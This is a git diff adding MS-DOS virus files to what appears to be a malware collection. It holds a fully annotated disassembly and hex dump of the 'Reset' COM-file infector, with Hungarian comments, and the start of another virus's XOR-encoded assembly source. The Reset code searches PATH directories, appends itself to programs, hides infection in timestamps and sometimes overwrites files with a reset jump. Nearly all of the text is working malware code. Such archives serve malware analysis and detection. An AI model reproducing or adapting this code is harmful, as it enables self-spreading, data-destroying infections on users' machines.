FA-5E 07 89 BC 16 00 8B FE ....u...^....... +114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:.. +114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,.. +114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.< +114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[...... +114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\......... +114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N..... +114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s... +114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y... +114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V.. +114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C.... +114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C..... +114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=...... +114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!.. +114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u.. +114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e.. +114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=. +114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC +114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-............. +114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@......... +114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B.... +114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........ +114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!............. +114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C. +114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!..... +114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3. +114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F. +114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM +114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET. +114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM +114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 .. +114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .????? +114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h +114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO +114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|. + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.v_dos625.lst b/MSDOS/Virus.MSDOS.Unknown.v_dos625.lst new file mode 100644 index 00000000..f5174385 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_dos625.lst @@ -0,0 +1,571 @@ +Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari + (41) 21-033 + + + +Unassemble list: + +114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere +114E:0103 49 DEC CX +114E:0104 60 DB 60 +114E:0105 61 DB 61 +114E:0106 6D DB 6D +114E:0107 206120 AND [BX+DI+20],AH +114E:010A 52 PUSH DX +114E:010B 65 DB 65 +114E:010C 7365 JNB 0173 +114E:010E 7420 JZ 0130 +114E:0110 56 PUSH SI +114E:0111 49 DEC CX +114E:0112 52 PUSH DX +114E:0113 55 PUSH BP +114E:0114 53 PUSH BX +114E:0115 2124 AND [SI],SP +114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott + ;program kezdete +114E:011A B409 MOV AH,09 +114E:011C CD21 INT 21 ;uzenet kepernyore +114E:011E B400 MOV AH,00 +114E:0120 CD20 INT 20 ;exit to DOS + +114E:0122 51 PUSH CX ;stack-en marad + + ;a kovetkezo utasitas operandusat fertozeskor + ;allitja be, igy mindig a helyes cimre mutat + +114E:0123 BA1B03 MOV DX,031B +114E:0126 FC CLD ;elore +114E:0127 8BF2 MOV SI,DX +114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte +114E:012D BF0001 MOV DI,0100 ;program eleje +114E:0130 B90300 MOV CX,0003 ;3 byte +114E:0133 F3 REPZ +114E:0134 A4 MOVSB ;eredeti JMP 117 + ;visszamasolasa +114E:0135 8BF2 MOV SI,DX +114E:0137 B430 MOV AH,30 +114E:0139 CD21 INT 21 ;DOS verzio szam lekerd. +114E:013B 3C00 CMP AL,00 +114E:013D 7503 JNZ 0142 +114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor + ;nem fertoz a virus s + ;futtatja az eredeti + ;programot +114E:0142 06 PUSH ES +114E:0143 B42F MOV AH,2F +114E:0145 CD21 INT 21 ;DTA. lekerdezese +114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset +114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese +114E:014F 07 POP ES + + ;DTA. beallitasa az ENTRY cimere /dir.-bol/ + ;ide masolja a find first a file adatait + +114E:0150 BA5F00 MOV DX,005F ;DX=037a +114E:0153 90 NOP +114E:0154 03D6 ADD DX,SI +114E:0156 B41A MOV AH,1A +114E:0158 CD21 INT 21 ;DTA. letrehozasa + ;037a-tol uj cimre +114E:015A 06 PUSH ES +114E:015B 56 PUSH SI +114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense +114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a + ;kovetkezo dir.-ra mu- + ;tatni +114E:0163 5E POP SI +114E:0164 56 PUSH SI +114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo + ;stringet keresi a + ;kornyezetbe PATH +114E:0169 AC LODSB ;AL=DS:[SI],SI++ +114E:016A B90080 MOV CX,8000 ;32 kbyte +114E:016D F2 REPNZ +114E:016E AE SCASB ;megkeresi a kovetke- + ;zo P betut +114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi +114E:0172 AC LODSB +114E:0173 AE SCASB ;betunkent hasonlitja +114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI. + ;karakter /kov.betu/ +114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es + ;osszehasonlitja a tobbi + ;betut is +114E:0178 5E POP SI +114E:0179 07 POP ES ;ES:DI mutat az elso + ;PATH-ra +114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file + ;spec. cimenek mentese + ;PATH mutato +114E:017E 8BFE MOV DI,SI ;SI=031b +114E:0180 81C71F00 ADD DI,001F ;DI=033a +114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu- + ;tat az adatokra +114E:0186 81C61F00 ADD SI,001F ;SI=033a +114E:018A 8BFE MOV DI,SI ;DI=033a +114E:018C EB3A JMP 01C8 + + ;A kovetkezo PATH-ban megadott aldirectoryt + ;File Path-ra masolja, igy a kovetkezo file-t + ;ebben az aldirectoryban keresi + +114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ; +114E:0193 7503 JNZ 0198 +114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva +114E:0198 1E PUSH DS +114E:0199 56 PUSH SI +114E:019A 26 ES: +114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense +114E:019F 8BFE MOV DI,SI ;DI=033a +114E:01A1 26 ES: +114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path + ;masolasa ha az aktualis + ;konyvtarban nem talalt + ;fertozheto file-t + ;a PATH= utanra mutat + ;az SI +114E:01A6 81C71F00 ADD DI,001F +114E:01AA AC LODSB ;beolvas a kornyezetbol + ;a 0029. byte-ot +114E:01AB 3C3B CMP AL,3B ;pontosvesszo ? +114E:01AD 740A JZ 01B9 ;igen +114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz + ;tobb +114E:01B1 7403 JZ 01B6 ;igen +114E:01B3 AA STOSB ;letarol 033a-tol +114E:01B4 EBF4 JMP 01AA + +114E:01B6 BE0000 MOV SI,0000 +114E:01B9 5B POP BX ;BX=regi SI BX mutat + ;az adatokra +114E:01BA 1F POP DS +114E:01BB 89B71600 MOV [BX+0016],SI + + ;a kovetkezo PATH-ban adott dir. mar atmasolva + +114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ? +114E:01C3 7403 JZ 01C8 ;igen +114E:01C5 B05C MOV AL,5C ;egyebkent \ iras + + ;egy aldir. kiertekelese, eloszor az aktualis, majd + ;a file path -ra masolt aldir. vegignezese, fertozes + ;DI a file path-ba irt aldir. neve utani poz.-ra mu- + ;tat + + ;COM file keresese + +114E:01C7 AA STOSB ;\ jel beirasa +114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a + ;file nevet masolni, + ;az aldir. neve utan +114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d +114E:01CE 81C61000 ADD SI,0010 ;SI=032b +114E:01D2 B90600 MOV CX,0006 +114E:01D5 F3 REPZ +114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa + ;a PATH= szoveg utan +114E:01D7 8BF3 MOV SI,BX +114E:01D9 B44E MOV AH,4E ;a file adatai a DTA. + ;alltal foglalt teru- + ;letre +114E:01DB BA1F00 MOV DX,001F +114E:01DE 90 NOP +114E:01DF 03D6 ADD DX,SI +114E:01E1 B90300 MOV CX,0003 +114E:01E4 CD21 INT 21 ;elso file bejegyzes ke- + ;resese, az it. aktivi- + ;zalasa utan felhozza a + ;filemeretet, attrib.ot + ;keletkezes datumat s + ;idejet is! +114E:01E6 EB04 JMP 01EC ;vizsgalatra +114E:01E8 B44F MOV AH,4F +114E:01EA CD21 INT 21 ;kovetkezo file bejegy- + ;zes keresese +114E:01EC 7302 JNB 01F0 ;ha nincs hiba +114E:01EE EB9E JMP 018E ;hiba eseten -ha nem + ;talal tobb COM file-t + ;mas aldirt keres + ;mar talalt COM file-t, az adataival az entry fel + ;van toltve, a file ellenorzese es fertozese + ;kovetkezik + +114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be + ;SI=0390 +114E:01F4 241F AND AL,1F ;maszk 31 -el +114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto- + ;zott a file! +114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo + ;file-t keresi +114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00 +114E:0200 77E6 JA 01E8 ;ha > a file meret + ;64000 byte-nal +114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A +114E:0207 72DF JB 01E8 ;ha < 10 byte nal +114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a + + ;megvan a kivalasztott file + ;a file nevet a filespec utan kell masolni + +114E:020D 56 PUSH SI ;DI mutat a filespec.re, + ;PATH=*.COM +114E:020E 81C67D00 ADD SI,007D ;SI=0398 + +114E:0212 AC LODSB ;atmasolja a filenevet + ;/megkeresett elso v. + ;x.edik bejegyzest/ +114E:0213 AA STOSB +114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle- + ;zaro nullaig masol +114E:0216 75FA JNZ 0212 ;nem +114E:0218 5E POP SI ;SI ujra az adatokra mu- + ;tat + ;a file egyes eredeti informacioinak megorzese + ;hogy a fertozese ne tunjon fel + ;minek a file ATTR. megegyszer lekerdezni? + +114E:0219 B80043 MOV AX,4300 +114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec. +114E:021F 90 NOP +114E:0220 03D6 ADD DX,SI ;DX=031b +114E:0222 CD21 INT 21 ;attributum lekerdezese + ;7.6.5.4.3.2.1.0. + ;x x a d v s h r +114E:0224 898C0800 MOV [SI+0008],CX ;attributum +114E:0228 B80143 MOV AX,4301 +114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC. + ;ra valtoztatja +114E:022F BA1F00 MOV DX,001F +114E:0232 90 NOP +114E:0233 03D6 ADD DX,SI ;DX=033a +114E:0235 CD21 INT 21 ;attributum beallitasa + + ;file nyitasa + +114E:0237 B8023D MOV AX,3D02 +114E:023A BA1F00 MOV DX,001F +114E:023D 90 NOP +114E:023E 03D6 ADD DX,SI ;DS:DX = filespec. +114E:0240 CD21 INT 21 ;file nyitasa I/O ra +114E:0242 7303 JNB 0247 +114E:0244 E9A500 JMP 02EC ;hiba eseten nincs + ;fertozes +114E:0247 8BD8 MOV BX,AX ;handle + + ;a file idejenek lekerdezese de ez is megtalalhato az + ;ENTRY teruleten + +114E:0249 B80057 MOV AX,5700 +114E:024C CD21 INT 21 ;file letrehozasi datum + ;es ido bekerese +114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc + DH-sec DL-1/100 +114E:0252 89940600 MOV [SI+0006],DX ;datum +114E:0256 B42C MOV AH,2C +114E:0258 CD21 INT 21 ;rendszerido bekerese + + ;annak eldontese hogy a filet tonkretegye-e + ;ha a masodperc 7 akkor tonkreteszi /aktualis/ + +114E:025A 80E607 AND DH,07 ;sec = 7 ? +114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre! + + ;file tonkretetele + +114E:025F B440 MOV AH,40 +114E:0261 B90500 MOV CX,0005 +114E:0264 8BD6 MOV DX,SI ;reset +114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0 +114E:026A CD21 INT 21 ;file elejere ir 5 byte + ;-ot a RESET re ugrast! +114E:026C EB65 JMP 02D3 + +114E:026E 90 NOP + + ;fertozes + ;az eredeti 3 byte megorzese hogy kesobb meg futtatni + ;lehessen + +114E:026F B43F MOV AH,3F +114E:0271 B90300 MOV CX,0003 +114E:0274 BA0A00 MOV DX,000A +114E:0277 90 NOP +114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA +114E:027A CD21 INT 21 ;a program eredeti elso + ;3 byte-jat beolvassa +114E:027C 7255 JB 02D3 ;ha hiba van +114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ? +114E:0281 7550 JNZ 02D3 ;nem + + ;file vegere allas az uj cimek kiszamitasa + +114E:0283 B80242 MOV AX,4202 +114E:0286 B90000 MOV CX,0000 +114E:0289 BA0000 MOV DX,0000 +114E:028C CD21 INT 21 ;file vegere pozicional +114E:028E 7243 JB 02D3 ;ha hiba volt -nem + ;nagyon lehet hiba! + + ;file elejere irando JMP operandus kiszamitasa + +114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz +114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP + ;utasitashoz amit a + ;file elejere fog irni + ;igy a JMP a file mos- + ;tani vege utani bytera + ;fog mutatni +114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim + + ;az uj file-on beluli adatterulet cimenek ki- + ;szamitasa es beallitasa + +114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli + ;adatteruletre mutat +114E:029D 8BFE MOV DI,SI +114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa- + ;nak operandusanak + ;cime +114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet + ;cimet + + ;file moge masolja magat + ;filemutato a file vegere mutat + +114E:02A5 B440 MOV AH,40 +114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza +114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara + ;mutat +114E:02AC 81EAF901 SUB DX,01F9 +114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a + ;program a fertozendo + ;program moge irja +114E:02B2 721F JB 02D3 ;hiba eseten +114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ? +114E:02B7 751A JNZ 02D3 ;igen + + ;az elso 3 byte atallitasa, egy file + ;vegere mutato ugro utasitasra + +114E:02B9 B80042 MOV AX,4200 +114E:02BC B90000 MOV CX,0000 +114E:02BF BA0000 MOV DX,0000 +114E:02C2 CD21 INT 21 ;file pointer a vegere +114E:02C4 720D JB 02D3 ;ha volt hiba -nem le- + ;het hiba! +114E:02C6 B440 MOV AH,40 +114E:02C8 B90300 MOV CX,0003 +114E:02CB 8BD6 MOV DX,SI +114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra + ;mutat +114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba + + ;az eredeti ido -mar a fertozesjelzessel egyutt- + ;visszaallitasa + +114E:02D3 8B940600 MOV DX,[SI+0006] ;datum +114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido +114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges! +114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy + ;jelzi hogy mar ferto- + ;zott egy file a SEC. + ;-et 31-re allitja a + ;file bejegyzesben + ; hour | min. | sec. + ;1111 1|111 111|0 0000 +114E:02E3 B80157 MOV AX,5701 +114E:02E6 CD21 INT 21 ;file keletk. ido beall. + + ;file zarasa + +114E:02E8 B43E MOV AH,3E +114E:02EA CD21 INT 21 ;file zarasa + + ;eredeti attributum visszaallitasa + +114E:02EC B80143 MOV AX,4301 +114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./ +114E:02F3 BA1F00 MOV DX,001F +114E:02F6 90 NOP + + ;DTA. visszaallitasa az eredeti cimre + +114E:02F7 03D6 ADD DX,SI +114E:02F9 CD21 INT 21 ;file attr. beallitasa +114E:02FB 1E PUSH DS +114E:02FC B41A MOV AH,1A +114E:02FE 8B940000 MOV DX,[SI+0000] +114E:0302 8E9C0200 MOV DS,[SI+0002] +114E:0306 CD21 INT 21 ;DTA. megadasa +114E:0308 1F POP DS + + ;az eredeti program futtatasa + +114E:0309 59 POP CX +114E:030A 33C0 XOR AX,AX ;reg. nullazasa +114E:030C 33DB XOR BX,BX +114E:030E 33D2 XOR DX,DX +114E:0310 33F6 XOR SI,SI +114E:0312 BF0001 MOV DI,0100 +114E:0315 57 PUSH DI ;elteszi a 0100 offsetet + ;hogy a RET elo tudja + ;venni es odaugrik +114E:0316 33FF XOR DI,DI +114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset- + ;re, ott mar az eredeti + ;JMP 117 utasitas van, + ;igy vegrehajtodik az + ;eredeti prg. + ;SP- hogy minek ? +114E:031B 800046 ADD BYTE PTR [BX+SI],46 +114E:031E 0D2001 OR AX,0120 +114E:0321 2100 AND [BX+SI],AX +114E:0323 2000 AND [BX+SI],AL +114E:0325 EB15 JMP 033C +114E:0327 90 NOP +114E:0328 E91F00 JMP 034A +114E:032B 2A2E434F SUB CH,[4F43] +114E:032F 4D DEC BP +114E:0330 0028 ADD [BX+SI],CH +114E:0332 004703 ADD [BX+03],AL +114E:0335 50 PUSH AX +114E:0336 41 INC CX +114E:0337 54 PUSH SP +114E:0338 48 DEC AX +114E:0339 3D5245 CMP AX,4552 +114E:033C 53 PUSH BX +114E:033D 45 INC BP +114E:033E 54 PUSH SP +114E:033F 2E CS: +114E:0340 43 INC BX +114E:0341 4F DEC DI +114E:0342 4D DEC BP +114E:0343 0000 ADD [BX+SI],AL +114E:0345 0000 ADD [BX+SI],AL +114E:0347 4D DEC BP +114E:0348 004449 ADD [SI+49],AL +114E:034B 54 PUSH SP +114E:034C 2E CS: +114E:034D 43 INC BX +114E:034E 4F DEC DI +114E:034F 4D DEC BP +114E:0350 0000 ADD [BX+SI],AL +114E:0352 2020 AND [BX+SI],AH +114E:0354 2020 AND [BX+SI],AH +114E:0356 2020 AND [BX+SI],AH +114E:0358 2020 AND [BX+SI],AH +114E:035A 2020 AND [BX+SI],AH +114E:035C 2020 AND [BX+SI],AH +114E:035E 2020 AND [BX+SI],AH +114E:0360 2020 AND [BX+SI],AH +114E:0362 2020 AND [BX+SI],AH +114E:0364 2020 AND [BX+SI],AH +114E:0366 2020 AND [BX+SI],AH +114E:0368 2020 AND [BX+SI],AH +114E:036A 2020 AND [BX+SI],AH +114E:036C 2020 AND [BX+SI],AH +114E:036E 2020 AND [BX+SI],AH +114E:0370 2020 AND [BX+SI],AH +114E:0372 2020 AND [BX+SI],AH +114E:0374 2020 AND [BX+SI],AH +114E:0376 2020 AND [BX+SI],AH +114E:0378 2020 AND [BX+SI],AH +114E:037A 013F ADD [BX],DI +114E:037C 3F AAS +114E:037D 3F AAS +114E:037E 3F AAS +114E:037F 3F AAS +114E:0380 3F AAS +114E:0381 3F AAS +114E:0382 3F AAS +114E:0383 43 INC BX +114E:0384 4F DEC DI +114E:0385 4D DEC BP +114E:0386 0301 ADD AX,[BX+DI] +114E:0388 0000 ADD [BX+SI],AL +114E:038A 002E8B26 ADD [268B],CH +114E:038E 68 DB 68 +114E:038F 2020 AND [BX+SI],AH +114E:0391 0121 ADD [BX+DI],SP +114E:0393 0022 ADD [BP+SI],AH +114E:0395 0000 ADD [BX+SI],AL +114E:0397 005245 ADD [BP+SI+45],DL +114E:039A 53 PUSH BX +114E:039B 45 INC BP +114E:039C 54 PUSH SP +114E:039D 2E CS: +114E:039E 43 INC BX +114E:039F 4F DEC DI +114E:03A0 4D DEC BP +114E:03A1 0000 ADD [BX+SI],AL +114E:03A3 4D DEC BP +114E:03A4 00EA ADD DL,CH +114E:03A6 F0 LOCK +114E:03A7 FF00 INC WORD PTR [BX+SI] +114E:03A9 F0 LOCK +114E:03AA 16 PUSH SS +114E:03AB 7C14 JL 03C1 + +Dump list: + +114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/. +114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L......... +114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L. +114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N......... +114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!........... +114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c: +114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye +114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\ +114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c: +114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal; +114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util......... +114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset +114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!.. +114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q............. +114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u.. +114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!......... +114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,. +114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V........... +114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^....... +114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:.. +114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,.. +114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.< +114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[...... +114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\......... +114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N..... +114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s... +114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y... +114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V.. +114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C.... +114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C..... +114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=...... +114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!.. +114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u.. +114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e.. +114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=. +114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC +114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-............. +114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@......... +114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B.... +114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........ +114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!............. +114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C. +114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!..... +114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3. +114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F. +114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM +114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET. +114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM +114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 .. +114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20 +114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .????? +114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h +114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO +114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|. + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm b/MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm new file mode 100644 index 00000000..8ed5643a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm @@ -0,0 +1,533 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 100h + +start: jmp l_02F3 ;0100 E9 01F0 + db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E + + + org 2F3h +;---------------------------------------------- +l_02F3: push cx ;02F3 51 + mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683 + nop ;02F7 90 + + ;<--------- encoding + push dx ;02F8 52 + pop bx ;02F9 5B + mov cx,0F9h ;coded block length ;02FA B9 00F9 + mov si,dx ;02FD 8B F2 + dec si ;02FF 4E + mov dl,[si] ;0300 8A 14 + inc si ;0302 46 +l_0303: mov al,[bx] ;encoding loop ;0303 8A 07 + xor al,dl ;0305 32 C2 + nop ;0307 90 + mov [bx],al ;0308 88 07 + inc bx ;030A 43 + loop l_0303 ;030B E2 F6 + mov dx,si ;030D 8B D6 + + ;<----- restore changed bytes + xor ax,ax ;030F 33 C0 + xor bx,bx ;0311 33 DB + cld ;0313 FC + mov si,dx ;0314 8B F2 + add si,0ADh ;x_00AD ;saved bytes address ;0316 .81 C6 00AD + mov di,100h ;target address 